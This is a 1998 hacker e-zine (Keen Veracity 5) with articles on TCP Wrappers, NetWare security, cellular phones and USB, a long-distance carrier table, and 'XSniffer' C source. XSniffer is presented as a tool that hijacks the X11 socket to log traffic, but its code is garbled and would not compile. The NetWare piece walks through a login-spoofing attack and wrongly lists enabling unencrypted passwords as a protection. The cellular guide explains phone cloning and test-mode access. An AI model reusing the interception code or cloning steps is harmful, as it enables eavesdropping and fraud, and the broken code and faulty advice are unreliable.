**************************************************************************** ____ __. | |/ _|____ ____ ____ | <_/ __ \_/ __ \ / \ | | \ ___/\ ___/| | \ |____|__ \___ >\___ >___| / \/ \/ \/ \/ A Legions Of the Underground Production ____ ____ .__ __ www.legions.org \ \ / /________________ ____ |__|/ |_ ___.__. \ Y // __ \_ __ \__ \ _/ ___\| \ __< | | \ /\ ___/| | \// __ \\ \___| || | \___ | [Issue 5] \___/ \___ >__| (____ /\___ >__||__| / ____| \/ \/ \/ \/ 014-NOV2 **************************************************************************** Hacking isn't about exploiting the system it's about knowing the system... *---The Legions Staff---* optiklenz - The man with the circuit board boxers icer - is in search of Terabyte ethernet nirvana. aphex -"I love rules, I think they're wicked" lasik - " that's not an ATARI 2600 is it!?" cap n crunch - "knows how to whistle" sreality - "the original code pimp - betta' act like you know, bitch ;)" HyperLogik/m0f0 Contact your local netherlands phone operator Zyklon - taking over the world with a 8086 and a 300 baud modem tip - brings his ALTAIR to nudy bars [havoc] - kM - kM- uses tape feeds to pimp his ho like a TX-0 defiant - "wheres my pay" Duncan Silver- DigiEbola - Of course I'm drunk, I ain't no stunt driver. flemming - "not with that burnt out peice of shit" Bronc Buster - the keyboard cowboy lothos - "The Doctor is IN" mercs - NetJammer - dethl0k -coded a loop in his tie NtWakO -Bugs in NT? Your shitting me.... x-empt - Mnemonic - ----o=============================================================================o----- You know the world is fucked up when we start appointing professional wrestlers into politics... [x1]--> From the Editor [ optiklenz<--] [x2] Mail Bag [ smtp <=-] [x3]--> Tcp Wrappers [ lothos <--] [x4] Novell Security [ NtWakO <=-] [x5]--> Cellular Guide - [ downtime <--] [x6] USB Theory of Utilization [ DigiEbola<=-] [x7]--> XSniffer [ Mnemonic <--] [x8] Long Distance Carriers [ Levine <=-] [x9]--> STD phone codes [ foneman <--] [x10]-> Telephony [ N6ARE <=-] [x11] Trip to Comdex [ optiklenz<--] [x12]-> In the News [ sources <=-] [x13] Till next time [ optiklenz<--] %%%%%%%%%%%%%%%%%%%%%%%% \ From the Editor \- %%%%%%%%%%%%%%%%%%%%%%%% Things are picking up as far as the whole Legions Interactive arrangement is concerned. We are lately working with the Meta Fantasies corporation on a large programming project This means due to all the work I'll be retiring my status as chief editor of Keen Veracity. So from now on feel free to email all your questions comments or article submissions to digi@wintermute.linux.tc Keen Veracity will still be around but DigiEbola will be taking my place as the editor. Rest assured each issue will still be chock-full of articles regarding computer related data. As I established in the first part of the zine. "Hacking is not about exploiting the system its about knowing the system." A lot of people out there login to their consoles, and get on irc and start talking about what they are going to "own" next. Hacking isn't "owning" the "net" (no one entity "owns" the net) its about building the net. Why inflict distress on a system created by hackers? Take advantage of what computers, and the network has to offer. Instead of sitting there compiling exploits figure how the exploits works, and how it is connected with the system, and how you can go about fixing it. But most of all figure out how the system works because once you do you've compiled the greatest exploit known to man. Use the system to your preference, and to the advantage of everyone else by circumventing the system and sharing what you've learned with everyone else because the truth remains that not everyone knows all there is to know. And the more information you share with others the closer we become to being a even more knowledgeable brotherhood That's all for now. The new site is up at http://www.legions.org | | |* shit to look out for*| | | [Look out for the official RootFest con press release in KV6] Submit an article to Keen Veracity: digi@wintermute.linux.tc ===================================EOP=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ mailbag \- %%%%%%%%%%%%%%%%%%%%%%%% [mail] David Kurby You guys are great. I've heard a lot about the things you do, and I think its really cool. Just want you to know you have my respect, and support. Looking forward to your next magazine release. [responce] yeah, sure kurb.. whatever... ------------------------------------ [mail] Can you teach me how to hack? [responce] Sure, grab an axe and let me know when your ready. ------------------------------------ [mail] Whats up with the site? [responce] We're currently switching name servers, and getting our new equipment configured. Check out www.t00ned.org/optik, and I'll keep you posted. ------------------------------------ [mail] Do you still hack? [responce] Well it depends on your analogue of hacking. By the authentic formalization I "hack" everyday. Whether I'm coding, or doing Network checks it's still hacking. Hacking has little to do with the "illegal" entry of computer systems apart from the Technical, and systematic aspect of it. Illegally accessing a system for no intended reason is not something I advocate or advise performing. What I suggest achieving is going out, and learning, and questioning the system itself before trying to exploit it. And even once you feel you have a broad knowledge of the system make sure you use what you know to build things, and not fuck things up. System admins who are affected by crackers turn to hackers in order to secure their systems. They turn to the philosophies, documents, and programs written by "hackers"... Let's not make them look the other way. We are here, and we are skilled. What your brain dead system administrator can do in a week we can accomplish in a matter of minutes more practically. That's the message that should be put across. One of positively not one that says "Were going to take you down." Read my introduction in Keen Veracity 3 I go into greater detail on the subject at hand. http://www.t00ned.org/optik/kv/kv3.txt -Steve Stakton [the below was sent to me by a writer for the Associated Press] Hi Optik, [question] I was wondering if you could answer a question or two. This lady came into the newsroom yesterday with a printout of a strang icon she found on her AOL instant messenger screen. Apparently it was put there by some kind of virus or trojan horse attached to a FateX program that her son downloaded. I understand from what little I could find on this that this is a "punter" program. What, exactly is a punter program? She says this thing totally screwed up her computer, including her DVD drive and she had to trash it and get a new one. Also, when this happened someone masqueraded as one of the people on her "buddy list" and she chatted with them for hours before finding out it wasn't who she thought it was. [responce] FaxeX is an AOL Denial of service program based on AOHell, which was the pioneer for AOL programs of its kind. This program embodies "attack" options such as "phishers", "punters", "scrollers", and other options that really only cause minor damage. These programs are created by teens whose coding experience in most cases do not go beyond visual basic. The programs that these juveniles create are made in poor taste, and the interfaces are so poorly put together it is obvious the authors lack any significant programming knowledge. For the most part The authors create these programs for publicity. (Don't know if that's much coming from the AOL community.) At any rate it isn't very hard to please the gimpy uses of the AOL citizenry (most of them anyhow) that is the largest concern AOL or anyone using it should have. These programs are downloaded by the thousands generally utilized by users who cant very well operate their computer system let alone be given access to a application of harassment (at which very little computer science is needed to operate). A worse case scenario would be someone using a "phisher" to obtain a user password. Even then it would take someone extremely dense to fall for it. A phisher is basically an instant message sent out to multiple users giving them a bull shit line such as "Hi, I work with AOL our server is being updated please message back with your Login and password. Failure to comply will result in having to re-register" A message like that if indeed from AOL will never be sent directly to the user using something as open as an IM (Instant Message), but most likely via email. Now as for punters these are tools that pose no real threat except for the fact that they are really annoying. All they do is send you a massive amount of messages till you are forced to log off, and restart your AOL session (ergo the term punt). I seriously doubt the program FateX itself was to blame for the system mishap. Maybe it was in an indirect manner, but a virus downloaded by her son would be a more illusive reason. Because AOL is a harbor for lamers, and the sort most of the programs sent out or downloaded in relation to AOL are most likely to be infected with some sort of virus. MY suggestion would be to download a virus scanner, such as Nortan Anti Virus 4.0 by Symantec or McAfee anti virus software. take care, Steve Stakton ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ Tcp Wrappers \- %%%%%%%%%%%%%%%%%%%%%%%% An Introduction to TCP Wrappers lothos lothos@thepentagon.com The TCP Wrappers program, from Wietse Venema, is an easy to use utility for host and network based access control that does logging for services started by inetd(8). TCP Wrappers will allow you to finger people who connect to you, display a banner for incoming telnet connections, or run an ambiguous command, and will also prevent some spoofing attacks by making sure the IP address and hostname match. _Getting TCP Wrappers_ TCP Wrappers is shipped with many flavors of unix, including BSD/OS, OpenBSD, and possibly other *BSD flavors. It comes standard with Linux, but is rarely configured correctly. You can get tcp_wrappers from ftp://ftp.win.tue.nl/pub/security/tcp_wrappers_7.6.tar.gz, or from ftp://coast.cs.purdue.edu/pub/tools/tcp_wrappers. Version 7.6 is the latest as of this writing. _Installing TCP Wrappers_ The advanced way to install tcp_wrappers, as instructed in the readme, is actually easier, so I will describe that way to install. 1. Copy the current /etc/inetd.conf to another location as a back up, such as /etc/inetd.conf.dist. 2. Edit tcpwrapper's Makefile to show where the real daemon's are located. Under OpenBSD I would uncomment REAL_DAEMON_DIR=/usr/libexec. 3. If you want the language extension enabled, uncomment the following line: #STYLE = -DPROCESS_OPTIONS # Enable language extensions. I recommend uncommenting this line, which makes access control easier by allowing you to specify access control in one file, instead of two, and also allows you to use the extra features, including banners and commands. 4. Next, compile tcpwrappers. If you simply type 'make' it will output an error message. You must specify the system type you have, as specified by the error message. _Configuring /etc/inetd.conf_ You must edit your inetd.conf file in order to use tcpwrappers. Change it to specify the location of tcpd. telnet stream tcp nowait root /usr/libexec/telnetd telnetd should be changed to: telnet stream tcp nowait root /usr/libexec/tcpd telnetd or the location of your tcpd daemon. A 'kill -HUP inetd' will update these changes. _Access Control_ Access is controlled by two files, /etc/hosts.allow and /etc/hosts.deny. If you followed my instructions above, you will only need the /etc/hosts.allow file. The format of this file is: daemons : client_host_list : option : option A simple example to demonstrate this: fingerd : local.machine.com : ALLOW NOTE: You should use ip addresses for increased security. TCP Wrappers should log to MAIL.INFO by default, but this can be changed in the Makefile. I have also set up my /etc/syslog.conf file so that the logs go to both a file and to /dev/ttyC7 so I can read them in real time. _Advanced Options_ Banners Banners display a message to someone connecting to your machine. You need to set up a directory for them, I have mine set up in /etc/Banners. Using banners, you can have separate banners for allowed hosts and denied hosts by using two directories (/etc/Banners/allowed/, for example) An example of a banner: Trying 192.168.0.0... Connected to 192.168.0.0. Escape character is '^]'. WARNING: This computer system is for authorized users only. Any unauthorized access will be logged and prosecuted. You have been logged as: root@phear.com OpenBSD/i386 (phear) (ttyp5) login: You can make your banners as simple or complex as you'd like. %c will return username@hostname info, assuming the other computer has identd running. Some expansions that can be used are: Token Mnemonic Expands to: %a address ip address of client. %c client info username@hostname %s server info daemon@host. There are many more options, these are the ones I use the most frequently. A denied host will display: Trying 192.168.0.0... Connected to 192.168.0.0. Escape character is '^]'. Connection closed by foreign host. You can also optionally specify a banner to display for deny as well by specifying a banner to use, to provide more information to the user about why the access is denied. If you want to allow fingerd from local hosts, and want external hosts to be denied with a message, you would configure /etc/hosts.allow like so: fingerd : LOCAL : allow fingerd : all : twist /path/to/message The twist option will run a specified shell command. You can also specify that tcpd finger anyone attempting to connect to your machine. We do not finger any finger connections, to prevent a continuous loop where the remote machine also fingers connections. all EXCEPT fingerd : bad.com : (/usr/local/bin/safe_finger -l @%h | \ /bin/mailx -s %d-%h security@phear.com) & You can split a command over two or more lines by using the backslash character. safe_finger is used because it filters out any nasty control characters. This command will mail the results of finger @bad.com to the user of your choice. _Checking Access Control Settings_ Besides coming with safe_finger, tcpwrappers also comes with two utilities that check your access control. From tcpdchk(8): tcpdchk examines your tcp wrapper configuration and reports all potential and real problems it can find. tcpdmatch will find a match in the access tables and tell you if it's allowed or denied, as well as displaying any banners you may have. This is a great way to see if your access files are thorough enough. _Limitations of tcpwrappers_ TCP Wrappers is vulnerable to IP spoofing because it uses IP addresses for host authentication. It will only provide authentication for daemons started by inetd(8), and only provides limited support for UDP services. There is a patch that allows tcpwrappers to be used with sendmail 8.8.8, but IMHO the wrapper that comes with TIS Firewall Tool Kit is much better. www.tis.com for more info. _Sources and More Info_ Read the man pages for more info: tcpd(8), tcpdchk(8), tcpdmatch(8), hosts_access(5), and hosts_options(5). There is also information about tcpwrappers in Practical Unix and Internet Security by Simson Garfinkel and Gene Spafford. Shoutouts: Legions of the Underground, Tara, Stratus, MostHateD, [gH], noderatz. ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ Novell Security \- %%%%%%%%%%%%%%%%%%%%%%%% Check out the Con webcast PhreakNic: http://209.251.14.140:7070/ramgen/pn2_how2.rm Securing / Auditing Novell First Simple Rule Upgrade to NetWare 4.x this will defeat many of the attacks NetWare provides no audit trail Your site's security policy should include a process for Administrator approval of user ID creation. Security Administration procedures, which your site security policy should govern and of which you keep a manual, record should include the following: * Reactivating disabled Ids * Reactivating forgotten passwords * Removing access when a user is terminated or has changed job functions * Monitoring changes to access privileges and entitlements the supervisor assigns to users to ensure that changes are appropriate for the user * Periodic review of user access privileges and entitlements to ensure that access level are still appropriate Starting to check your installation security Many Hacker attacks exploit common-sense failings of the system, you should be sure that you secure your NetWare network. NetWare security program provides information on how the supervisor installed security on the system. You can also use the security program to perform a compliance review. Only the supervisor and users with Supervisor equivalent Ids can run the security program. Physically secure the server * You should at a minimum control access to the server room with key access, preferably by some type of electronic key card access with track. * If the server has a door with a lock on the server itself lock the door and limit access to the key. Secure the keyboard within a cabinet or other locked area to prevent command entry directly into the operating system. * If you only load NLMs from SYS:SYSTEM directory, use the SECURE CONSOLE command to prevent loading NLMs from the floppy or other location. Secure important files off-line and protecting scripts * You should always secure your most important files off-line and off-site. You most important files refer to startup.ncf, autoexec.ncf, the NetWare bindary or the NDS. * You should copy all the system log-in scripts, container scripts, and all the user or other log-in scripts off-line. NetWare stores the log-in scripts in the SYS:_NETWARE directory a hacker can edit these files using edit.nlm. File with extensions such .000. these files are probably log-in scripts. * You should compile a list of network-loadable modules and their version numbers, and a list of files from the SYS:LOGIN, SYS:PUBLIC, and SYS:SYSTEM directories, you should periodically check your file list against the originals stored on the computers themselves to ensure that no one has altered any of the files * You should create a written list of all users and groups on your network, use syscon or another network tool to create a written list of users, groups, access levels, check the list against a report from Novell security program., check for ODD accounts with Supervisor access such as GUEST or PRINTER Monitor the Console/Administrator * Just as you should physically secure the console, you should ensure that the network logs all activities users perform on the console. To log console entire use the conlog.nlm program the log will be recorded in SYS:ETC\console.log. When you check the console you should also press the UP-ARROW key befor you begin to enter your commands at the console. Doing so will show what commands the last user entered at the console. * Run the securefx.nlm module after the security breach and you get this message : Security breach against station DETECTED. The securefx.nlm will writes its error message to an error log. * You should avoid using the Supervisor account for any except the most critical of access activities. If you have not enabled packet signatures someone could use a program that spoofs user packets and gain access to the server as Supervisor. Use Packet signature * The NetWare login protocol consists of three packet exchanges between the server and the client. First the client sends a request for a login key, the server generates a random eight byte value and sends it to the client. Then the client sends a request for for the user ID of the user loging in, the server looks up the user ID in the bindery and sends it to the client. Finally, the client computes X=hash(UID,password) and Y=hash(X,login key) andsends the result to the server. The server retrieves X'=hash(UID,password) stored in the bindery and computes Y'=hash(X',login key). If Y=Y', the client is granted access as the user. If both the client and server agree to use packet signatures, both parties then compute Z=hash(X,c) (where c is some constant value) which they will use as a shared secret for authentication. The following chart gives a graphical representation of the protocol: Client Server Request Login Key ------------------------------------------------> <------------------------------------------------ Login Key Request User ID ------------------------------------------------> <------------------------------------------------ UID of client Compute X=hash(UID,password) Compute X'=hash(UID,password) Compute Y=hash(X,login key) Compute Y'=hash(X,login key) Request Authentication ------------------------------------------------> If Y=Y', Access is Granted Comput Z=hash(X,c) Compute Z=hash(X,c) When a user Alice logs in, an attacker Bob can interrupt this protocol sequence and gain access as Alice without knowing her password. In order for the procedure to work, Bob must be on a network where he can observe the traffic between Alice and the server, and Bob must be able to respond to Alice's requests faster than the server. First Bob sends a request to the server to login, and the server sends Bob a login key R". Then Alice requests a login key from the server, Bob sees the request and spoofs a reply as the server which sends Alice R" as her login key. The server receives Alice's request and sends her R as her login key, when Alice receives R she will discard it as a duplicate. Alice requests her UID from the server, and the server responds with her UID. Alice computes X=hash(UID,password) and Y=hash(X,R") and sends the result to the server. The server computes Y'=hash(X,R), since Y' is not equal to Y, Alice is denied access. Meanwhile, Bob saw Alice's Y submitted to the server, he retrieves this value from the network and sends it to the server for authentication as Alice. The server computes Y"=hash(X,R"), sice Y = Y" Bob is granted access as Alice. Bob requests not to sign packets, if the server does not require all clients to sign packets, then Bob is allowed to masqurade as Alice. Alice Bob Server Requests Login Key R" ----> <---- Sends R" to Bob Requests Login Key R -----------------------------------> <---- Sends R" to Alice <----------------------------------- Sends R to Alice Receives R" first Discards R as a duplicate Requests UID for Alice -----------------------------------> <----------------------------------- Sends UID of Alice Computes X=hash(UID,password) Computes Y=hash(X,R") Sends Y to the server -----------------------------------> Computes Y'=hash(X,R) Sees Y and retrieves it. Y != Y', access is denied Sends Y for ---> Computes authentication Y"=hash(X,R") Y"=Y, access is granted Refuses to sign packets If all clients are not REQUIRED to sign packets, access is granted. There may be a second attacker, Joe, waiting for Alice to log in without using packet signatures. As a result, Joe can highjack Bob's connection as Alice. To defend against this attack, set the NCP PACKET SIGNATURE LEVEL option to 3 in the server's AUTOEXEC.NCF file. Setting this option to 3 at the client will have no effect, the option MUST be set at the server. The Netware default for packet signatures is 2 at the server and client. If the hacker wants to use a hacking tool which forges packets, the hacker can try to set the worksation signature level to 0 (no packets required) within the computer client net.cfg. If the server is set to 1 or 0 the hacker will log in right to the network and defeat the entier purpose of the packet signatures. Rconsole * The rconsole utility lets the Supervisor monitor the network at the server-level remotly. To log into rconsole the Supervisor must enter an rconsole password, a hacker using a sniffer can sniffer the password and crack it. * Do not try to use the switch /P=password switch to limit the rconsole password to just the Supervisor password, if you use "LOAD REMOTE /P="Supervisor password you will get into rconsole but the rconsole password is now "/P". * Worse of the hacker gains access to your autoexec.ncf file the rconsole pawword is visible in plain text. * Check the name and location of rconsole, rconsole.exe is located in the SYS:SYSTEM directory by default in 3.11, in 3,12, 4.1 rconsole is in SYS:SYSTEM and SYS:PUBLIC. You should limit access to the file only by the Administrator. Move all Netware configuration files to secure location * By default Netware places all Netware configuration files (ncf) within the SYS:SYSTEM directory. Because most hackers know this, their first goal to access the SYSTEM directory and modify the ncf files. Your best defense against hackers attacking your configuration files is to move the files to a more secure location * Put your autoexec.ncf in the same location as your sever.exe file. If a hacker compromises the access to the SYS:SYSTEM directory, you will at least have protected the autoexec.ncf file. * A simple trick you can do is to keep a false autoexec.ncf file in the SYS:SYSTEM with a false rconsole password. Remove PUBLIC from ROOT in 4.1's NDS * Unlike 3.1, 4.1 includes a single trustee which essentially grants everyone read access to every directory on the system. To prevent all users from seeing the entire directory tree remove the PUBLIC Trustee from the ROOT object's Trustee list. Default system accounts * When you install Netware the installation creates two or four default accounts :Supervisor and the guest in netware 3.x and Supervisor guest admin and user_template in netware 4.x. When the network creates the default accounts none of the default account has password. For example many installation will use a printer account or LASERPRINTER account with no passowrd on them. Hacking and defending passwords * In Netware 2.x 3.x the bindery file's attributes are hidden and system and both located on the SYS:SYSTEM subditectory, in 4.x they are located in SYS:_NETWARE * 2.x net$bind.sys, net#bval.sys this file conatin the paswords * 3.x net$boj.sys, net$prop.sys, net$val.sys this file conatin the paswords * 4.x value.nds part of the NDS block.nds part of the NDS entry.nds part of the NDS partitio.nds type of NDS partition (replica master, etc) mls.000 License vallincen.dat Licence validation If the intrusion detection system IDS is disabled the hacker can use a brute force to crack the password.. * Set the unencrypted option by entering the following line at the console or adding it to autoexec.ncf SET ALLOW UNENCRYPTED PASSWORD=ON * The best protection against dictionary attacks is to force users to regularly change their passwords. * Periodically run security or another system analysis program for a somaple passwords check, and instruct the users to use eight-letter minimum passowrds which include numerals, symbols and letters. ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ Cellular Guide \- %%%%%%%%%%%%%%%%%%%%%%%% Contents ~~~~~~~~ 1) Some of the Cellular Phone Basics 2) The reason for the name Cellular. 3) Review of the Cellular System. 4) What goes on during Cellular Calling. 5) Cellular Cloning and Other Features. 6) Basic Test Mode Programming 7) What kind of Cellular is Best? 8) Where is the Cellular Technology Going? 9) Closing _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " Introduction ~~~~~~~~~~~~ We have all seen them, heard about them, and most people use them. What am I talking about? None other than the Cellular Phone. One of the most interesting things ever that is associated with the Phreaking Community. This guide will not tell you how to do illegal things with your cell but this will give you a basic view of how the cellular phone works. Enjoy! _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 1) Some of the Cellular Phone Basics The main thing to remember about a cellular phone is that it is a radio. It is basically like a hand held walkie talkie except with a cellular phone you have alot more capabilities and can talk and listen at the same time. Remember though that when you are talking on a cellular phone what you say may and possibly will be monitored very easily. There are two main types of Cellular Phones Analog and Digital. 1) Analog: On this the audio is modulated directly onto a carrier 2) Digital: On Digital, these are converted to digitized samples. These are transmitted as 1's and 0's. Then it is converted back to voltage so you get the audio signal. Each Cellular Phone has to identify itself to its cell site before service is allowed. They are identified by what is known as an ESN and a MIN. 1) ESN: This stands for Electronic Serial Number. This is a 32-bit Binary Number if I am not mistaken. 2) MIN: Mobile Identification Number. This is the phone number of the Cellular Phone. 10 digits including area code and all. _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 2) The Reason for the name Cellular. The reason for this is that in each city the Cellular Phone System is divided into smaller sections also referred to as cells. These usually have an antenna on top of a high surface that gives out strong signals therefore giving you clear service. _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 3) Review of the Cellular System. The main system operating in the United States is the AMPS, Advanced Mobile Phone System. The AMPS are composed of two different things: 1) EAMPS: This system has 832 channels. 2) NAMPS: This system has three times the amount with very clear signals. All these have 42 channels that are used to setup calls the rest are for talking over the Cellular Phone. _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 4) What goes on during Cellular Calling. Just imagine if you are stranded somewhere or possibly just want to use your cellular phone to call someone. Have you ever wondered how it worked? Why it worked? If so then I will explain how and why in this section here. Enjoy! 1) Scan Channels: In this step the cellular phone scans for the closest cell site near you so that you can get the strongest signals possible due to your location at the moment. 2) Choose Strongest: As stated above the cellular phone finds the closest site to give you the best performance. 3) Send Message: The phone sends a short message to the cell site verifying the MIN, ESN, and the number that you have just entered to call. 4) Assign Channel: After verifying the above information and they know that you are a legal paying customer, the base assigns a mesage to your phone, telling it where the conversation is. 5) Talk: Phone then gets on that channel and begins to ring. Then you begin to talk like normal. The easiest step of them all. _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 5) Cellular Cloning and Other Features. Cellular Cloning is one of the newest and more popular things going on now a days. What you are basically doing is programming someone else's MIN and ESN into your phone in the process of fooling your cellsite into thinking that you are actually them. Is this legal? Well it depends on which way you use it. If you use it to clone one of your own phones where you can have two phones exactly the same then no, but if you are cloning someone else's then yes it is very illegal. The philosophy of a cellular phone phreak as stated in another text written by John Markoff is to push the machines as far as they would go. The possibilites with a cellular phone are practically endless. You can make one into a scanner as well as many other things. The first step of being able to do ANY of this is getting the cellular phone into what people call test mode. This is where you can practically change the whole phone's features. The main way to get into this is to crack the access code. There is a good site that deals with that at the following URL: http://www.radiophone.com They have great information. Another way to get a cellular phone is by taking the battery pack off of the back and look in the lower corner. Here you will see some little prongs, you can get a small piece of tin foil and place it in the center of the prong like so: |*| then put the battery pack back on the back of the phone. Then turn the phone on and when you turn it on you should see an array of flashing numbers. If so you are in luck because you are in test mode! :)~ _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 6) Basic Test Mode Programming This section will tell you what to do once you get into the test mode. This part comes from 1993 Cellular Subscriber Technical Training Manual. I give full credit to them for this information. I am not going to include all of it because it would take forever. Here are some of the basics. Enjoy! 32# = clear the phone 38# = displays the ESN 55# = test mode programming 01# = restart 13# = power off 16# = setup 18# = send NAM 34# = turn DTMF off 61# ESN transfer That is jsut some of the very basics. Of course there is alot more and if I ever write another article with Cellular Phones I will include some more. Don't want to get very much ahead of ourselves. :) _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 7) What kind of Cellular is Best? There are different kinds of cellular phones for different kind of people. Me personally I have experience so far with only Motorola. I plan to get a Nokia soon. Nokia are very advanced and have many options. There is also the OKI those have been stated to be good. The one that interests me at the moment are these new ones that are Java based. If you would like to read more about these go to the following URL: http://www.nortel.com/cool/norteledge/edge298/N._IP_N.html But as stated above many people like many different things, there is also a new Motorla that is the IDEN I10000. These have two-way radio and alphanumeric pager in one. These weigh in at around 5 oz. as well. They also include: One touch call back, a speakerphone, and a multilanguage operation that displays prompts in one to four different languages. For more information on this you can call: 1.800.453.0920 _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 8) Where is the Cellular Technology Going? This is a very interesting thing to think about including all the things that they already have out and available at this point in time. There is no way to actually predict what is going to come out next due to people having new ideas with each and every passing day. It should be an interesting thing to think forward about. Whatever it is, it will turn heads I am sure! _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " 9) Closing We have seemed to read the end of this guide. I hope this has been an informative source and you enjoyed it. I will probably write another cellular guide in the future but am not sure at the moment. Remember "Push the Machine as Far as it will Go!" =) _____________________________________________________________________________ " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " " ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ USB- Where it's going\- %%%%%%%%%%%%%%%%%%%%%%%% In the struggle for better peripheal technology, there can always be improvementThese days, speed is a issue as well as easy usability. The USB or Universal Serial Bus is a product of this struggle. With USB, you can connect a virtual plethora of devices, such as cameras, scanners, and drives. You can even go as far as running a network off USB. This new technology is the wave of the future in more ways then one. In this article, I will outline advantages of the Universal Serial Bus as well as uses that go beyond the standard fare. ========== Advantages ========== USB is fast. Much faster then the standard serial port. 12 megabit per second speed. Also, in addition to the speed, you can have 120+ devices on one USB port Most of the devices are hot-swapable, allowing them to initialize without a reboot of the system. The USB has excellant versitility, with its digital connection, allowing you to uses speakers, telephones, and attach to networks. ======= Uses ======= Now while the many kinds of devices are being developed for USB, the world seemsslow on implementing it. Imagine a house, that is ran by computer. This is the founding technology that will connect it. You could design a entire security system based on USB and have it all controlled thru a terminal. With standard parts availiable out of electronic catalogs, you can construct your security system, using laser diodes, electronic locks, thumbprint id, and cameras. With the speed USB offers, there is no way better to integrate everything. With a maximum of 127 devices, it is suited to almost anysize house. If ran on a linux terminal, you could even connect remotely to enable or disable any device in thesystem. Now, most people do not bother with hi-tech security in the homes, but you could even extend the system to home appliances, lights and windows. Think you left your oven on? Telnet in and shut it off. With the internet, and personal communication merging, you could even use a cgi interface to control your home from the web, as well as down load images of the kids sleeping while you are away, or checking to make sure the dog is still alive. ================================= The Future of USB, and Hacking It ================================= With the integration of USB is complete, do not be surprised if the things such as standard telephones, tvs, and radios utilize it. Entire computer systems can be built off the technology. With this in mind, for the average person on the go, the laptop will serve not only as it does now, a portable office, but as a full fledged media tool and personal communicator. This will open so many avenues for the people of the digital age. One scenario is, you go over to a a friends, and wish to exchange files. You set your laptop on the table, and whip out a cable, and plug it into the Intranet via wall socket. Instantly, the system assimulates you like you were meant to be there. You now have access to the entire system, including the phone, and media services. This technology will bring many avenues to explore as well as secure. If phones are implemented, it will take phreaking to a whole new level. Entire houses will be comprimised, as well as the security systems mentioned above. The job of the security consultant or the cracker will get more interesting. While all this sounds corny, society wants convienence, and with that brings security holes and even flaws. I urge anyone with the skills to start developing USB periphealsand if your like me, a security system. Integrate your house, your car and even your dog with USB. ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ XSniffer \- %%%%%%%%%%%%%%%%%%%%%%%% /*XSniffer listens to a port. It reads a line at a time from the port and saves the data to log.txt, and then outputs the data to Y0. Works with Redhat 4.2 and 4.0. To change everything back to normal, mv Y0 X0. For XSniffer to work, rename X0 to Y0 and rename XSniffer to Y0 in the /tmp/.X11-unix/ directory.*/ #include #include #include #include #includes //XSniffer copyright 1998 Mnemonic #include //what's up Blood????? #include #include #include #include #include #define Y0 "/tmp/X11-unix/Y0" #define log "log.txt" void loop(); int sock_readln(sockfd, str, count) int sockfd; char *str; size_t count; { int thisRead; int total = 0; char *curr; char charln = 0; curr = str; while (charln != 10) { thisRead = read(sockfd, &charln, 1); if (thisRead <= 0) { return(-1); //you overflowed the buffer, buddy } if ((charln != 10) && (charln != 13 )) { if (total < count) { curr[0] = charln; curr++; total++; } else return(-1); } } curr[0] = 0; return(total); } int main(argc, argv) int argc; char **argv; { int sock; int newsock; int inr; int connected; unsigned short port; long int lport; struct sockaddr_in address; char buffer[1024]; char newbuff[1024]; char *errpos; if (argc != 2) { printf("just type in the freaking port next time"); exit(-1); } lport = strtol(argv[1], &errpos, 0); port = htons(lport); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = port; address.sin_addr.s_addr = htonl(INADDR_ANY); sock = socket(AF_INET, SOCK_STREAM, 0); bind(sock, (struct sockaddr *) &address, sizeof(address)); listen(sock, 1); newsock = accept(sock, NULL, NULL); connected = 1; while (connected) { if (sock_readln(newsock, buffer, 1024) <= -) { connected = 0; } int handle; char c; handle = open(log, O_WRONLY); printf(str); close(handle); outport(sock_readln(newsock, buffer, 1024), X1); else { outport(sock_readln(newsock, buffer, 1024, Y0); } close(newsock); close(sock); loop(); return(0); } void loop() { main(); } /*shoutouts to everyone in #legions on efnet*/ ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%%% \ Long Distance Carriers\- %%%%%%%%%%%%%%%%%%%%%%%%% Here's another table from the FCC's BBS listing all of the operating IXC's in the country with the states where they operate. There's a big matrix of which states each carrier operates in, not reproduced here. I was surprised to find that the only carriers that operate in all 50 states (actually 49 states and D.C., since Alaska is special, until very recently a monopoly jointly operated by Alascom and AT&T) are the big three, AT&T, MCI, and Sprint. C&W, LDDS, and Wiltel operate in 49 states, all but Alaska. Allnet operates in 48, all but Alaska and Arkansas. (I have no idea what their problem is in Arkansas.) There are two that operate in 45 states, and the rest are down in the 30s or below. The state with the fewest carriers listed is Delaware, with 6. I expect that's a wart of geography -- all of Delaware is in the Philadelphia LATA, so Delaware customers can be served from a POP in Pennsylvania. Regards, Levine, johnl@iecc.com Primary Perpetrator of "The Internet for Dummies" STATES CARRIER CIC ACNA SERVED Totals by state: ACC LONG DISTANCE CORPORATION 0234 ACT 9 ACCESS LONG DISTANCE 0991 AMM 7 ACCESS SERVICES dba PACIFIC NW TELECOM 0013 GMS 3 ACCESS-PLUS, INC. 0551 AEQ 1 ACTION TELECOMMUNICATIONS CO. 0282 ATC 4 ADDTEL COMMUNICATIONS 0414 ADX 1 ADVANCED COMMUNICATIONS SYSTEMS, INC. 0260 AVD 2 ADVANTIS 0755 ALC 3 AFFILIATED TELECOM SVCS., INC. 0790 AFF 1 ALASCOM, 